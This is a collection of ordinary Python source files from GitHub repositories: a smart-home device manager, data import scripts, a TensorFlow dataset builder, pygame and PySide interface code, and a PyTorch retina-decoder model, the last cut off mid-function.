+{"seq_id":"19256011877","text":"#!/usr/bin/python3\n# -*- coding: utf8 -*-\n'''\nGère les équipements\n'''\n\nfrom datetime import datetime\n# -------\nimport Attribute\nimport Command\nimport LEDPanel as DEV_LEDPanel\nimport Config\n\nclass Manager:\n def __init__(self):\n self.devices = []\n self.devices.append(General())\n self.devices.append(LEDPanel())\n\n def execute(self, query):\n device = None\n for dev in self.devices:\n if (dev.getName() == query.getTargetDevice()):\n device = dev\n break\n\n if (device == None):\n return Command.Answer(Command.Answer.CODE_ERROR_UNKNOW_DEVICE, Command.Answer.ERROR_CODE_TO_TEXT[Command.Answer.CODE_ERROR_UNKNOW_DEVICE])\n\n if (query.getMode() == Command.Query.MODE_READ):\n return device.get(query.getArgument().getName())\n else:\n return device.set(query.getArgument().getName(), query.getArgument().getValue())\n\nclass BaseDevice:\n def __init__(self):\n self.name = None\n self.attributes = []\n\n def isAttributeExists(self, attributeName):\n for attribute in self.attributes:\n if (attribute.getName() == attributeName):\n return True\n\n return False\n\n def getName(self):\n return self.name\n\n def getAttribute(self, attributeName):\n attr = None\n for attr in self.attributes:\n if (attributeName == attr.getName()):\n break\n\n return attr\n\n def get(self, attributName):\n ''' Méthode à surcharger '''\n\n def set(self, attributeName, attributeValue):\n ''' Méthode à surcharger '''\n\nclass General(BaseDevice):\n def __init__(self):\n super().__init__()\n self.name = \"general\"\n self.attributes.append(Attribute.ReadOnly(\"heure\"))\n self.attributes.append(Attribute.ReadOnly(\"date\"))\n self.attributes.append(Attribute.ReadOnly(\"temps\"))\n\n def get(self, attributeName):\n r = Command.Answer(Command.Answer.CODE_ERROR_UNKNOW_ATTRIBUTE, Command.Answer.ERROR_CODE_TO_TEXT[Command.Answer.CODE_ERROR_UNKNOW_ATTRIBUTE])\n now = datetime.now()\n curTime = '{dt.hour} heure {dt.minute}'.format(dt=now)\n curDate = '{dt.day}/{dt.month}/{dt.year}'.format(dt=now)\n\n if (attributeName == \"heure\"):\n r = Command.Answer(Command.Answer.CODE_OK, \"Il est %s.\" % (curTime))\n elif (attributeName == \"date\"):\n r = Command.Answer(Command.Answer.CODE_OK, \"Nous sommes le %s.\" % (curDate))\n elif (attributeName == \"temps\"):\n r = Command.Answer(Command.Answer.CODE_OK, \"Nous sommes le %s, il est %s.\" % (curDate, curTime))\n\n return r\n\n def set(self, attributeName, attributeValue):\n return Command.Answer(Command.Answer.CODE_ERROR_READONLY_ATTRIBUTE, Command.Answer.ERROR_CODE_TO_TEXT[Command.Answer.CODE_ERROR_READONLY_ATTRIBUTE])\n\nclass LEDPanel(BaseDevice):\n def __init__(self):\n super().__init__()\n self.name = \"bandeau\"\n self.controller = DEV_LEDPanel.Controller(Config.LEDPANEL_MAC_ADDRESS)\n self.attributes.append(Attribute.Boolean(\"alimentation\"))\n self.attributes.append(Attribute.Integer(\"luminosité\"))\n self.attributes.append(Attribute.TextColor(\"couleur\"))\n\n '''\n def __del__(self):\n self.controller.stopAdapter()\n '''\n\n def get(self, attributName):\n return Command.Answer(Command.Answer.CODE_ERROR_INVALID_VALUE, \"Cet équipement ne supporte pas la lecture d'attribut.\")\n\n def set(self, attributeName, attributeValue):\n r = Command.Answer(Command.Answer.CODE_ERROR_UNKNOW_ATTRIBUTE, Command.Answer.ERROR_CODE_TO_TEXT[Command.Answer.CODE_ERROR_UNKNOW_ATTRIBUTE])\n attribute = self.getAttribute(attributeName)\n\n if (attribute == None):\n return r\n\n r = attribute.setValue(attributeValue)\n if (r == False):\n return 
Command.Answer(Command.Answer.CODE_ERROR_INVALID_VALUE, Command.Answer.ERROR_CODE_TO_TEXT[Command.Answer.CODE_ERROR_INVALID_VALUE])\n\n if (attributeName == \"alimentation\"):\n if (attributeValue == \"0\"):\n self.controller.powerOff()\n else:\n self.controller.powerOn()\n elif (attributeName == \"luminosité\"):\n self.controller.setBrightness(int(attributeValue))\n elif (attributeName == \"couleur\"):\n self.controller.setColor(*attribute.getValue())\n\n return Command.Answer(Command.Answer.CODE_OK, \"La valeur de l'attribut a été modifiée avec succèes !\")\n","repo_name":"kadeseb/Nestor","sub_path":"Code/Device.py","file_name":"Device.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"74904608545","text":"import numpy\nimport math\nimport scipy.misc\n\ndef lagre_bilde(data: str, høyde: int, bredde: int, sti: str):\n bilde = numpy.array(list(data), dtype=int).reshape((høyde, bredde))\n scipy.misc.toimage(bilde, cmin=0.0, cmax=1.0).save(sti)\n\ndef main():\n BILDEFIL = 'img.txt'\n\n with open(BILDEFIL) as f:\n data = f.read()\n\n lengde = len(data)\n\n # Finner gyldige høyde x bredde\n oppløsninger = []\n\n for i in range(2,math.ceil(math.sqrt(lengde))):\n if lengde % i == 0:\n oppløsninger.append((i, lengde//i))\n oppløsninger.append((lengde//i, i))\n\n # Lagrer alle bildene\n for oppløsning in oppløsninger:\n lagre_bilde(data,\n oppløsning[0],\n oppløsning[1],\n f\"./bilder/{oppløsning[0]}x{oppløsning[1]}.png\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Boren/knowit-julekalender-2019","sub_path":"03/luke03.py","file_name":"luke03.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"no","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"11345431875","text":"from homeserver.models.coasters.park import CoasterPark\nfrom homeserver.models.coasters.ride import CoasterRide\nfrom homeserver.models.coasters.coasterTrack import CoasterTrack\nfrom homeserver.database import db\nfrom homeserver.app import app\n\nfrom sqlalchemy.orm.exc import NoResultFound\n\nimport json\nimport re\n\ncoasters = []\nparks = []\n\nwith open('data/combined.json') as data:\n data = json.load(data)\n for coaster in data[\"coasters\"]:\n coasters.append(coaster)\n for park in data[\"parks\"]:\n parks.append(park)\n\nwith app.app_context():\n for park in parks:\n status = park[\"status\"]\n if status == \"Defunct\":\n status = 2\n elif status == \"SBNO\":\n status = 3\n else:\n status = 1\n #pk = CoasterPark(name=park[\"name\"], rcdbID=park[\"rcdbId\"], status=status, address=park[\"address\"], openDate=park[\"openDate\"], statusDate=park[\"statusDate\"])\n \n #db.session.add(pk)\n\n db.session.commit()\n\n badParks = set()\n\n for coaster in coasters:\n status = coaster[\"status\"]\n if status == \"Defunct\":\n status = 2\n else:\n status = 1\n\n try:\n park = CoasterPark.query.filter_by(rcdbID=coaster[\"parkid\"]).one()\n cstr = CoasterRide(park=park.id, name=coaster[\"name\"], rcdbID=coaster[\"rcdbid\"], ridden=False, coasterOrRide=True, statusDate=coaster[\"statusDate\"], openDate=coaster[\"openDate\"], status=status)\n db.session.add(cstr)\n except NoResultFound:\n badParks.add(coaster[\"parkid\"])\n print(\"No result found for \", coaster[\"parkid\"])\n\n for coaster in coasters:\n for track in coaster[\"tracks\"]:\n cstr = CoasterRide.query.filter_by(rcdbID=coaster[\"rcdbid\"]).one()\n t = CoasterTrack(modelLayout=coaster[\"modelLayout\"], configuration=coaster[\"configuration\"], modelCategory=coaster[\"modelCategory\"], make=coaster[\"make\"], coasterType=coaster[\"coasterType\"], coaster=cstr.id)\n \n length = db.Column(db.Integer)\n speed = db.Column(db.Integer)\n elements = db.Column(db.String(500), unique=False)\n duration = db.Column(db.String(10), unique=False)\n verticalAngle = db.Column(db.Integer)\n drop = db.Column(db.Integer)\n \n if \"inversions\" in track and track[\"inversions\"] and len(track[\"inversions\"]) > 0:\n t.inversions = int(re.sub('[^0-9]', '', str(track[\"inversions\"])))\n\n if \"height\" in track and track[\"height\"] and len(track[\"height\"]) > 0:\n t.height = int(re.sub('[^0-9]', '', str(track[\"height\"])))\n\n if \"length\" in track and track[\"length\"] and len(track[\"length\"]) > 0:\n t.length = int(re.sub('[^0-9]', '', str(track[\"length\"])))\n \n if \"speed\" in track and track[\"speed\"] and len(track[\"speed\"]) > 0:\n t.speed = int(re.sub('[^0-9]', '', str(track[\"speed\"])))\n\n if \"elements\" in track:\n t.elements = \", \".join(track[\"elements\"])\n\n if \"duration\" in track:\n t.duration = track[\"duration\"]\n\n if \"vertical angle\" in track and track[\"vertical angle\"] and len(track[\"vertical angle\"]) > 0:\n t.verticalAngle = int(re.sub('[^0-9]', '', str(track[\"vertical angle\"])))\n\n if \"drop\" in track and track[\"drop\"] and len(track[\"drop\"]) > 0:\n t.drop = int(re.sub('[^0-9]', '', str(track[\"drop\"])))\n\n db.session.add(t)\n\n db.session.commit()\n\nprint(badParks)","repo_name":"joshimbriani/homeserver","sub_path":"importRCDBData.py","file_name":"importRCDBData.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"17428818453","text":"from uuid import uuid4\nimport csv\nimport requests\nimport yaml\nfrom convert import ewtstobo\n\nclass MyDumper(yaml.Dumper):\n\n def increase_indent(self, flow=False, indentless=False):\n return super(MyDumper, self).increase_indent(flow, False)\n\n\ndef represent_none(self, _):\n return self.represent_scalar('tag:yaml.org,2002:null', '')\n\n\ndef write_mapping(op_work_id,bdrc_work_id):\n map_file = \"./works/mappings/bdrc.csv\"\n with open(map_file, \"a\") as file:\n csvwriter = csv.writer(file)\n csvwriter.writerow([op_work_id, bdrc_work_id])\n\n\ndef get_meta(bdrc_work_id, op_work_id):\n api_id = f\"http://purl.bdrc.io/query/graph/OP_info?R_RES=bdr:{bdrc_work_id}&format=json\"\n response = requests.get(api_id)\n\n \n if response.status_code != 200:\n return\n\n content = response.json()\n meta_dict = {}\n meta_dict[\"id\"] = str(op_work_id)\n\n meta_dict[\"bdrc-work-id\"] = bdrc_work_id\n li = []\n\n if isavailable(\"http://www.w3.org/2004/02/skos/core#prefLabel\",content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"]) == True:\n title = ewtstobo(content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"][\"http://www.w3.org/2004/02/skos/core#prefLabel\"][0][\"value\"])\n meta_dict[\"title\"] = title\n else:\n meta_dict[\"title\"] = None\n\n if isavailable(\"http://www.w3.org/2004/02/skos/core#altLabel\",content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"])==True:\n for id in content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"][\"http://www.w3.org/2004/02/skos/core#altLabel\"]:\n li.append(ewtstobo(id[\"value\"]))\n\n if not li:\n meta_dict[\"alternative-title\"]=None\n else:\n meta_dict[\"alternative-title\"] = li\n\n meta_dict[\"author\"] = None\n\n if isavailable(\"http://purl.bdrc.io/ontology/core/isRoot\",content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"]) == True:\n value = content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"][\"http://purl.bdrc.io/ontology/core/isRoot\"][0][\"value\"]\n print(value)\n meta_dict[\"isRoot\"]= value.strip(\"'\")\n else:\n meta_dict[\"isRoot\"] = None\n\n if isavailable(\"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\",content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"]) == True: \n meta_dict[\"type-definition\"] = content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"][\"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\"][0][\"value\"]\n else:\n meta_dict[\"type-definition\"] = None\n\n if isavailable(\"http://purl.bdrc.io/ontology/core/language\",content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"]) ==True:\n meta_dict[\"language\"] = content[f\"http://purl.bdrc.io/resource/{bdrc_work_id}\"][\n \"http://purl.bdrc.io/ontology/core/language\"][0][\"value\"]\n\n meta_dict[\"wiki-data-id\"] = None\n\n meta_dict[\"instances\"] = None\n\n return meta_dict\n\ndef isavailable(param,body):\n if param in body:\n return True\n else:\n return False \n\ndef write_works(bdrc_work_id, op_work_id):\n meta_content = get_meta(bdrc_work_id, op_work_id)\n yaml.add_representer(type(None), represent_none)\n\n yml_file = f\"./yaml/{op_work_id}.yml\"\n if meta_content is None:\n return\n with open(yml_file, \"w\", encoding = \"utf-8\") as file:\n yaml.dump(meta_content, file,Dumper=MyDumper,sort_keys=False,\n default_flow_style=False, allow_unicode = True)\n\ndef get_uuid():\n return uuid4().hex\n\nif __name__ == \"__main__\":\n file_path = \"clusters-manual.csv\"\n with open(file_path, \"r\") as csvfile:\n csvreader = csv.reader(csvfile)\n for row in csvreader:\n op_work_id = get_uuid()\n 
write_mapping(op_work_id,row[1])\n write_works(row[1], op_work_id)\n print(\"pass\")\n","repo_name":"jungtop/Works","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29335205075","text":"import io\nimport re\nimport zipfile\n\nfrom absl import logging\nfrom tensorflow_datasets.core.utils.lazy_imports_utils import tensorflow as tf\nimport tensorflow_datasets.public_api as tfds\n\n_CITATION = \"\"\"\\\n@Inproceedings (Conference){asirra-a-captcha-that-exploits-interest-aligned-manual-image-categorization,\nauthor = {Elson, Jeremy and Douceur, John (JD) and Howell, Jon and Saul, Jared},\ntitle = {Asirra: A CAPTCHA that Exploits Interest-Aligned Manual Image Categorization},\nbooktitle = {Proceedings of 14th ACM Conference on Computer and Communications Security (CCS)},\nyear = {2007},\nmonth = {October},\npublisher = {Association for Computing Machinery, Inc.},\nurl = {https://www.microsoft.com/en-us/research/publication/asirra-a-captcha-that-exploits-interest-aligned-manual-image-categorization/},\nedition = {Proceedings of 14th ACM Conference on Computer and Communications Security (CCS)},\n}\n\"\"\"\n\n_URL = (\n \"https://download.microsoft.com/download/3/E/1/\"\n \"3E1C3F21-ECDB-4869-8368-6DEBA77B919F/kagglecatsanddogs_5340.zip\"\n)\n_NUM_CORRUPT_IMAGES = 1738\n_DESCRIPTION = (\n \"A large set of images of cats and dogs. \"\n \"There are %d corrupted images that are dropped.\" % _NUM_CORRUPT_IMAGES\n)\n\n_NAME_RE = re.compile(r\"^PetImages[\\\\/](Cat|Dog)[\\\\/]\\d+\\.jpg$\")\n\n\nclass CatsVsDogs(tfds.core.GeneratorBasedBuilder):\n \"\"\"Cats vs Dogs.\"\"\"\n\n VERSION = tfds.core.Version(\"4.0.1\")\n RELEASE_NOTES = {\n \"4.0.0\": \"New split API (https://tensorflow.org/datasets/splits)\",\n \"4.0.1\": (\n \"Recoding images in generator to fix corrupt JPEG data warnings\"\n \" (https://github.com/tensorflow/datasets/issues/2188)\"\n ),\n }\n\n def _info(self):\n return tfds.core.DatasetInfo(\n builder=self,\n description=_DESCRIPTION,\n features=tfds.features.FeaturesDict({\n \"image\": tfds.features.Image(),\n \"image/filename\": tfds.features.Text(), # eg 'PetImages/Dog/0.jpg'\n \"label\": tfds.features.ClassLabel(names=[\"cat\", \"dog\"]),\n }),\n supervised_keys=(\"image\", \"label\"),\n homepage=(\n \"https://www.microsoft.com/en-us/download/details.aspx?id=54765\"\n ),\n citation=_CITATION,\n )\n\n def _split_generators(self, dl_manager):\n path = dl_manager.download(_URL)\n\n # There is no predefined train/val/test split for this dataset.\n return [\n tfds.core.SplitGenerator(\n name=tfds.Split.TRAIN,\n gen_kwargs={\n \"archive\": dl_manager.iter_archive(path),\n },\n ),\n ]\n\n def _generate_examples(self, archive):\n \"\"\"Generate Cats vs Dogs images and labels given a directory path.\"\"\"\n num_skipped = 0\n for fname, fobj in archive:\n res = _NAME_RE.match(fname)\n if not res: # README file, ...\n continue\n label = res.group(1).lower()\n if tf.compat.as_bytes(\"JFIF\") not in fobj.peek(10):\n num_skipped += 1\n continue\n\n # Some images caused 'Corrupt JPEG data...' 
messages during training or\n # any other iteration recoding them once fixes the issue (discussion:\n # https://github.com/tensorflow/datasets/issues/2188).\n # Those messages are now displayed when generating the dataset instead.\n img_data = fobj.read()\n img_tensor = tf.image.decode_image(img_data)\n img_recoded = tf.io.encode_jpeg(img_tensor)\n\n # Converting the recoded image back into a zip file container.\n buffer = io.BytesIO()\n with zipfile.ZipFile(buffer, \"w\") as new_zip:\n new_zip.writestr(fname, img_recoded.numpy())\n new_fobj = zipfile.ZipFile(buffer).open(fname)\n\n record = {\n \"image\": new_fobj,\n \"image/filename\": fname,\n \"label\": label,\n }\n yield fname, record\n\n if num_skipped != _NUM_CORRUPT_IMAGES:\n raise ValueError(\n \"Expected %d corrupt images, but found %d\"\n % (_NUM_CORRUPT_IMAGES, num_skipped)\n )\n logging.warning(\"%d images were corrupted and were skipped\", num_skipped)\n","repo_name":"tensorflow/datasets","sub_path":"tensorflow_datasets/image_classification/cats_vs_dogs.py","file_name":"cats_vs_dogs.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","stars":4045,"dataset":"github-code","pt":"70"}
+{"seq_id":"24476685712","text":"'''\nCoroBot Camera Portal\nDeveloper: CoroWare\nDate: 20, October 2014\nVersion 0.01\n\nAuthor: Cameron Owens \n\n\nPython File for Managing and Creating Camera Portal\n'''\n\n\nimport cv2\nfrom PySide import QtCore, QtGui\nimport numpy\nimport sys\n\nclass VideoDisplayPort(QtGui.QWidget):\n\n def __init__(self,parent, colorMode = 'RGB'):\n QtGui.QWidget.__init__(self)\n# self.video_size = QSize(320, 240)\n self.setup_ui()\n self.setup_camera()\n self.colorMode = colorMode\n def setup_ui(self):\n \"\"\"Initialize widgets.\n \"\"\"\n self.videoDisplay = QtGui.QLabel()\n# self.image_label.setFixedSize(self.video_size)\n \n \n self.main_layout = QtGui.QGridLayout(self)\n self.main_layout.addWidget(self.videoDisplay, 0,0)\n \n self.setLayout(self.main_layout)\n \n def setup_camera(self):\n \"\"\"Initialize camera.\n \"\"\"\n self.capture = cv2.VideoCapture(0)\n \n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.display_video_stream)\n self.timer.start(30)\n \n def display_video_stream(self):\n \"\"\"Read frame from camera and repaint QLabel widget.\n \"\"\"\n _, frame = self.capture.read()\n if self.colorMode == 'RGB':\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n elif self.colorMode=='BW':\n frame = cv2.cvtColor(frame, cv2.THRESH_BINARY_INV)\n elif self.colorMode=='TOL_Zero':\n frame = cv2.cvtColor(frame, cv2.THRESH_TOZERO) \n image = QtGui.QImage(frame, frame.shape[1], frame.shape[0], \n frame.strides[0], QtGui.QImage.Format_RGB888)\n self.videoDisplay.setPixmap(QtGui.QPixmap.fromImage(image))\n","repo_name":"CandidCypher/SparkControl0.2.0","sub_path":"CameraPortal.py","file_name":"CameraPortal.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"26704729315","text":"import pygame\nimport os\nimport random as rd\nfrom game import main_game_loop\nfrom pygame.locals import (\n K_ESCAPE\n)\n\npygame.init()\n\nres = (1920, 1080)\nscreen = pygame.display.set_mode(res)\nbackground = pygame.image.load('images/homescreen_bg.jpg').convert_alpha()\nbackground_rescaled = pygame.transform.scale(background, res)\n\nwidth = screen.get_width()\nheight = screen.get_height()\n\nbutton_font = pygame.font.SysFont('Showcard Gothic', 50)\ncoup_font = pygame.font.SysFont('Showcard Gothic', 100)\ncoup_text = coup_font.render(\"Welcome to COUP\", True, (255, 255, 255))\n\n\nclass Button:\n def __init__(self):\n self.width = 600\n self.height = 100\n self.x = width / 2 - 320\n self.y = height / 2\n self.color_grey = (100, 100, 100)\n self.color_red = (0, 0, 100)\n self.button_text = button_font\n\n def render_button(self):\n return pygame.draw.rect(screen, self.color_grey, [self.x, self.y, self.width, self.height], border_radius=10)\n\n def render_button_text(self):\n button_text = self.button_text.render(\"PLAY\", True, (255, 255, 255))\n return screen.blit(button_text, (self.x + 225, self.y + 30))\n\n def hover_button_box(self):\n x, y = pygame.mouse.get_pos()\n if self.x <= x <= self.x + 600 and self.y <= y <= self.y + 100:\n return pygame.draw.rect(screen, self.color_red, [self.x, self.y, self.width, self.height], border_radius=10)\n\n def hover_click(self):\n x, y = pygame.mouse.get_pos()\n if self.x <= x <= self.x + 600 and self.y <= y <= self.y + 100:\n return True\n\n def click_button(self):\n return\n\n\nbutton = Button()\n\nrunning = True\nwhile running:\n pressed_key = pygame.key.get_pressed()\n mouse_state = pygame.mouse.get_pressed()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if pressed_key[K_ESCAPE]:\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN and button.hover_click():\n main_game_loop()\n running = False\n\n screen.blit(background_rescaled, (0, 0))\n\n button.render_button()\n button.hover_button_box()\n button.render_button_text()\n\n screen.blit(coup_text, (500, 300))\n\n pygame.display.flip()\n pygame.display.update()\n","repo_name":"DanTheManWithAPIan/Coup---Card-Game","sub_path":"home_screen.py","file_name":"home_screen.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"36314130236","text":"import random\nvec=[]\nfor i in range (30):\n vec.append(round(random.randint(5,28)))\nprint(vec)\nm1=vec[:15]\ns=0\nfor i in m1:\n s+=i\nprint('Promedio primera quincena=',s/len(m1))\nm2=vec[15:-1]\nt1=vec[:11]\nprint(m1)\nprint(m2)\nprint(t1)","repo_name":"padillasam/python2560664B","sub_path":"listas/rebanadas1.py","file_name":"rebanadas1.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"21554086872","text":"# encoding=utf-8\nfrom until.ObjectMap import *\nfrom until.ParseConfigurationFile import ParseCofigFile\n\n\nclass HomePage(object):\n\n def __init__(self, driver):\n self.driver = driver\n self.parseCF = ParseCofigFile()\n\n def addressLink(self):\n try:\n # 从定位表达式配置文件读取定位通讯录按钮的定位方式和表达式\n locateType, locatorExpression = self.parseCF.getOptionValue(\"126mail_homePage\",\n \"homePage.addressbook\").split(\">\")\n # 获取登录页面的输入登录方式按钮页面对象,并返回给调用者\n elementObj = getElement(self.driver, locateType, locatorExpression)\n return elementObj\n except Exception as e:\n raise e\n\n\n","repo_name":"lxc1997YE/DataDrivenFrameWork","sub_path":"pageObjects/HomePage.py","file_name":"HomePage.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"23512979841","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nimport os\n\nimport recurrent_convolution as crnns\nfrom temporal_convolution import TemporalConv3dStack, CausalTranspose3d\nfrom util_modules import Permuter, make_pool3d_layer\nfrom sim_util import StackPlotter\nfrom create_movies import ProgressBar\n\nimport torch\nfrom torch import nn\n# import torch.nn.functional as F\nfrom torch import optim\n\nfrom custom_loss import DecoderLoss\nfrom retina_dataset_h5 import RetinaVideos\nfrom torch.utils.data import DataLoader\n\n# import time as timer\n\n\"\"\"\nThoughts:\n- scale the calculated loss up by a function of how much alpha has\n decreased, since decaying alpha will decrease loss on it's own?\n out = mean(loss) * start_alpha/current_alpha\n There is probably a better equation, but this gets at the idea...\n- Tried 5x5x5 transpose (no post-conv) and found the resulting decodings\n were diffuse, may be that the 5x5 spatial part of the kernel was too\n expansive especially at the first spatial upsampling stage.\n- try RMSProp with momentum soon, see whether more stable than ADAM\n- batch_sz=8 makes gradient much more stable. Even with lr=1e-1.\n\"\"\"\n\n\nclass RetinaDecoder(nn.Module):\n\n def __init__(self, pre_pool, grp_tempo_params, conv_params,\n crnn_cell_params, temp3d_stack_params, trans_params,\n post_conv_params):\n super(RetinaDecoder, self).__init__()\n # layer parameters\n self.pre_pool = pre_pool\n self.grp_tempo_params = grp_tempo_params\n self.conv_params = conv_params\n self.crnn_cell_params = crnn_cell_params\n self.temp3d_stack_params = temp3d_stack_params\n self.trans_params = trans_params\n self.post_conv_params = post_conv_params\n # create model and send to correct device (GPU if available)\n self.build()\n self.dv = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.to(self.dv)\n\n def build(self):\n # # # # # # # # # # ENCODER NETWORK # # # # # # # # # #\n encoder_mods = []\n\n # pooling operation before any processing\n if 'op' in self.pre_pool: # skip by leaving param dict empty\n encoder_mods.append(make_pool3d_layer(self.pre_pool))\n\n # Grouped Temporal CNN, operating on each cluster channel separately\n for p in self.grp_tempo_params:\n encoder_mods.append(\n TemporalConv3dStack(\n p['in'], p['out'], p.get('kernel', (2, 1, 1)),\n p.get('space_dilation', 1), p.get('groups', 1),\n p.get('dropout', 0), p.get('activation', nn.ReLU)\n )\n )\n if 'pool' in p:\n encoder_mods.append(make_pool3d_layer(p['pool']))\n\n # Spatial Only (non-causal) convolutional layers\n for p in self.conv_params:\n d, h, w = p.get('kernel', (1, 3, 3))\n pad = (d//2, h//2, w//2)\n encoder_mods.append(\n nn.Conv3d(\n p['in'], p['out'], (d, h, w), p.get('stride', 1), pad,\n p.get('dilation', 1), p.get('groups', 1),\n p.get('bias', True)\n )\n )\n encoder_mods.append(nn.BatchNorm3d(p['out']))\n encoder_mods.append(p.get('activation', nn.ReLU)())\n if 'pool' in p:\n encoder_mods.append(make_pool3d_layer(p['pool']))\n\n # Stack of Convolutional Recurrent Network(s)\n if len(self.crnn_cell_params) > 0:\n # swap time from depth dimension to first dimension for CRNN(s)\n # (N, C, T, H, W) -> (T, N, C, H, W)\n encoder_mods.append(Permuter((2, 0, 1, 3, 4)))\n for p in self.crnn_cell_params:\n # recurrenct convolutional cells (GRU or LSTM)\n encoder_mods.append(\n p.get('crnn_cell', crnns.ConvGRUCell_wnorm)(\n p['dims'], p['in_kernel'], p['out_kernel'], p['in'],\n p['out'], p.get('learn_initial', False),\n p.get('return_hidden', False)\n 
)\n )\n if 'post_activation' in p:\n encoder_mods.append(p['post_activation']())\n if len(self.crnn_cell_params) > 0:\n # swap time back to depth dimension following CRNN(s)\n # (T, N, C, H, W) -> (N, C, T, H, W)\n encoder_mods.append(Permuter((1, 2, 0, 3, 4)))\n\n # Temporal CNN\n for p in self.temp3d_stack_params:\n encoder_mods.append(\n TemporalConv3dStack(\n p['in'], p['out'], p.get('kernel', (2, 3, 3)),\n p.get('space_dilation', 1), p.get('groups', 1),\n p.get('dropout', 0), p.get('activation', nn.ReLU)\n )\n )\n\n # package encoding layers as a Sequential network\n self.encoder_net = nn.Sequential(*encoder_mods)\n\n # # # # # # # # # # DECODER NETWORK # # # # # # # # # #\n decoder_mods = []\n\n # Causal Transpose Convolutional layers (upsampling)\n for p in self.trans_params:\n decoder_mods.append(\n CausalTranspose3d(\n p['in'], p['out'], p['kernel'], p['stride'],\n p.get('groups', 1), p.get('bias', True),\n p.get('dilations', (1, 1, 1))\n )\n )\n decoder_mods.append(nn.BatchNorm3d(p['out']))\n decoder_mods.append(p.get('activation', nn.Tanh)())\n\n # Spatial Only (non-causal) convolutional layers\n for p in self.post_conv_params:\n d, h, w = p.get('kernel', (1, 3, 3))\n pad = (d//2, h//2, w//2)\n decoder_mods.append(\n nn.Conv3d(\n p['in'], p['out'], (d, h, w), p.get('stride', 1), pad,\n p.get('dilation', 1), p.get('groups', 1),\n p.get('bias', True)\n )\n )\n decoder_mods.append(nn.BatchNorm3d(p['out']))\n decoder_mods.append(p.get('activation', nn.Tanh)())\n\n # package decoding layers as a Sequential network\n self.decoder_net = nn.Sequential(*decoder_mods)\n\n def forward(self, X):\n X = self.encoder_net(X)\n X = self.decoder_net(X)\n return X\n\n def fit(self, train_set, test_set, lr=1e-4, epochs=10, batch_sz=1,\n loss_alpha=10, loss_decay=1, print_every=0, peons=2):\n\n train_loader = DataLoader(\n train_set, batch_size=batch_sz, shuffle=True, num_workers=peons\n )\n test_loader = DataLoader(\n test_set, batch_size=batch_sz, num_workers=peons\n )\n N = train_set.__len__() # number of samples\n\n # DecoderLoss equivalent to MSE when alpha=0 (original default: 10)\n self.loss = DecoderLoss(alpha=loss_alpha, decay=loss_decay).to(self.dv)\n self.optimizer = optim.Adam(self.parameters(), lr=lr, eps=1e-8)\n\n n_batches = N // batch_sz\n print_every = n_batches if print_every < 1 else print_every\n train_prog = None\n train_costs, test_costs = [], []\n for i in range(epochs):\n cost = 0\n print(\"epoch:\", i, \"n_batches:\", n_batches)\n # start = 0\n for j, batch in enumerate(train_loader):\n # print('time to load batch', timer.time()-start)\n # start = timer.time()\n net, stim = batch['net'].to(self.dv), batch['stim'].to(self.dv)\n cost += self.train_step(net, stim)\n del net, stim, batch\n # print('time to train', timer.time()-start)\n train_prog.step() if train_prog is not None else 0\n if j % print_every == 0:\n test_prog = ProgressBar(\n test_set.__len__() // batch_sz,\n size=test_set.__len__() // batch_sz,\n label='validating: '\n )\n # costs and accuracies for test set\n test_cost = 0\n for t, testB in enumerate(test_loader, 1):\n net = testB['net'].to(self.dv)\n stim = testB['stim'].to(self.dv)\n testB_cost = self.get_cost(net, stim)\n del net, stim, testB\n test_cost += testB_cost\n test_prog.step()\n test_cost /= t+1\n print(\"validation cost: %f\" % (test_cost))\n\n train_prog = ProgressBar(\n print_every, size=test_set.__len__()*2 // batch_sz,\n label='training: '\n )\n train_prog.step() if j == 0 else 0 # hack, skipped batch\n # start = timer.time()\n\n # Decay 
